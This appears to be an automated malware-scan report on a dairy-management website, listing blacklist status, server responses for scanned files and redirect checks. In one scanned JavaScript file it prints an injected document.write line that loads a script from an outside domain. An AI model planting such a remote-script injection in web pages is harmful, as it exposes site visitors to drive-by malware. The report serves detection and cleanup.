Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dairynet2000.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dairynet2000.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dairynet2000.com/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Mon, 02 Jun 2014 06:39:23 GMT Location: http://www.dairynetinc.com Server: Microsoft-IIS/6.0 Content-Length: 147 Content-Type: text/html MicrosoftOfficeWebServer: 5.0_Pub Set-Cookie: ASPSESSIONIDSCTQDCSB=EHPFMNACHOAOGEGANAJGOHCL; path=/ X-Powered-By: ASP.NET | clean |
http://www.dairynetinc.com/ | 200 OK Content-Length: 13595 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.dairynet2000.com ...[6249 bytes skipped]... =x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} } //--> </script> <body onLoad="MM_preloadImages('images/DDev2.gif','images/relService2.gif','images/radarMGMT2.gif')"> <br> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="31%"><div align="center"><a href="http://www.dairynet2000.com" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('DairyDev','','images/DDev2.gif',1)"><img src="images/DDev1.gif" alt="Dairy Development" name="DairyDev" width="246" height="97" border="0"></a></div></td> <td width="37%"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10%" rowspan="4"><div align="left">< ...[9666 bytes skipped]... | ||
http://www.dairynetinc.com/inc/milonic_src.js | 200 OK Content-Length: 5322 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://merlinmania.com/bj2ftxqg.php?id=112317516"></script>'); | ||
http://dairynet2000.com/inc/menu_data.js | 200 OK Content-Length: 9823 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) _menuCloseDelay=500 _menuOpenDelay=150 _subOffsetTop=5 _subOffsetLeft=-10 with(menuStyle=new mm_style()){ onbgcolor="#34A553"; oncolor="#FFFFFF"; offbgcolor="#434A9B"; offcolor="#FFFFFF"; bordercolor="#459631"; borderstyle="solid"; borderwidth=0; separatorcolor="#FFFFFF"; separatorsize="1"; padding=5; fontsize="8pt"; fontstyle="normal"; fontfamily="Ve Antivirus reports:
| ||
http://dairynet2000.com/content/dairytransitionservices.asp | 200 OK Content-Length: 9460 Content-Type: text/html | clean |
http://dairynet2000.com/inc/milonic_src.js | 200 OK Content-Length: 11349 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) licenseNumber=193271;licenseURL="dairynet2000";_mD=2;_d=document;_n=navigator;_L=location;_nv=$tL(_n.appVersion);_nu=$tL(_n.userAgent);_ps=parseInt(_n.productSub);_f=false;_t=true;_n=null;_W=window;_wp=_W.createPopup;ie=(_d.all)?_t:_f;ie4=(!_d.getElementById&&ie)?_t:_f;ie5=(!ie4&&ie&&!_wp)?_t:_f;ie55=(!ie4&&ie&&_wp)?_t:_f;ns6=(_nu.indexOf("gecko")!=-1)?_t:_f;konq=(_nu.indexOf("konqueror")!=-1)?_t:_f;sfri=(_nu.indexOf("safari")!=-1)?_t:_f; Antivirus reports:
| ||
http://dairynet2000.com/sitemap/default.asp | 200 OK Content-Length: 10903 Content-Type: text/html | clean |
http://dairynet2000.com/sitemap/../../application/controlchart/default.asp | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://dairynet2000.com/test404page.js | 404 Not Found Content-Length: 103 Content-Type: text/html | clean |
http://dairynet2000.com/sitemap/../../Connections/dairynet.asp | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://dairynet2000.com/sitemap/../../application/graphit/default.asp | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://dairynet2000.com/sitemap/../../application/MPICalc/default.asp | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://dairynet2000.com/sitemap/../../application/RationCost/default.asp | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://dairynet2000.com/sitemap/../../application/profitteams/default.asp | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://dairynet2000.com/sitemap/../../content/dairyassessmentsystem.asp | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://dairynet2000.com/sitemap/../../application/contact/default.asp | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dairynet2000.com
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Mon, 02 Jun 2014 06:39:23 GMT
Location: http://www.dairynetinc.com
Server: Microsoft-IIS/6.0
Content-Length: 147
Content-Type: text/html
MicrosoftOfficeWebServer: 5.0_Pub
Set-Cookie: ASPSESSIONIDSCTQDCSB=EHPFMNACHOAOGEGANAJGOHCL; path=/
X-Powered-By: ASP.NET
...147 bytes of data.
GET / HTTP/1.1
Host: dairynet2000.com
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Mon, 02 Jun 2014 06:39:23 GMT
Location: http://www.dairynetinc.com
Server: Microsoft-IIS/6.0
Content-Length: 147
Content-Type: text/html
MicrosoftOfficeWebServer: 5.0_Pub
Set-Cookie: ASPSESSIONIDSCTQDCSB=EHPFMNACHOAOGEGANAJGOHCL; path=/
X-Powered-By: ASP.NET
...147 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dairynet2000.com
Referer: http://www.google.com/search?q=dairynet2000.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dairynet2000.com
Referer: http://www.google.com/search?q=dairynet2000.com
Result:
The result is similar to the first query. There are no suspicious redirects found.